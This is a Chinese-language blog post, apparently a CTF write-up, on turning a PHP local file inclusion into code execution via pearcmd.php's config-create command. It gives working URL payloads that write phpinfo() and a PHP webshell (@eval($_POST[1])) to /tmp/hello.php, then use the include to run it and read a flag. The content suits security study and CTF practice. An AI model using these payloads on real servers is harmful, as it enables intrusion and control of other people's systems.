文件包含之包含pearcmd.PHP漏洞 1.概念 pecl是php中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的; 在7.4及以后,需要我们在编译PHP的时候指定--wit
pecl是php中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的;
在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装。
不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在/usr/local/lib/php。
要利用这个pearcmd.php需要满足几个条件:
(1).要开启reGISter_arGC_argv这个选项在Docker中使自动开启的
(2).要有文件包含的利用
我们再来看一下pearcmd.php可以接受哪些命令
看到config-create,去阅读其代码和帮助,可以知道,这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。
所以最后构造出payload:
/index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/=phpinfo()?>+/tmp/hello.php
上面是将=phpinfo()?>写到/tmp/hello.php,然后我们再使用文件包含进行包含我们之前写入的文件(hello.php)就可以了。
shell? RCE via LFI if you get some trick,this question will be so easy!if(!preg_match("/base64|rot13|filter/i",$_GET['file']) && isset($_GET['file'])){ include($_GET['file'].".php");}else{ die("Hacker!");}
(1)将后门代码(=@eval($_POST[1])?>)传入指定文件(/tmp/hello.php)
payload:/index.php?+config-create+/&file=/usr/local/lib/php/pearcmd&/=@eval($_POST[1])?>+/tmp/hello.php
注意1:用burpsuite传GET,用hackbar会被url编码,传入文件无法解析
注意2:/index.php可以去掉。只需要:
?+config-create+/&file=/usr/local/lib/php/pearcmd&/=@eval($_POST[1])?>+/tmp/hello.php
(2)访问传入的后门代码(hello.php文件),并传入参数执行。
先列出根目录。
查看源码,发现flag所在文件。
直接读取flag。
--结束END--
本文标题: 浅谈文件包含之包含pearcmd.php漏洞
本文链接: https://www.lsjlt.com/news/391337.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0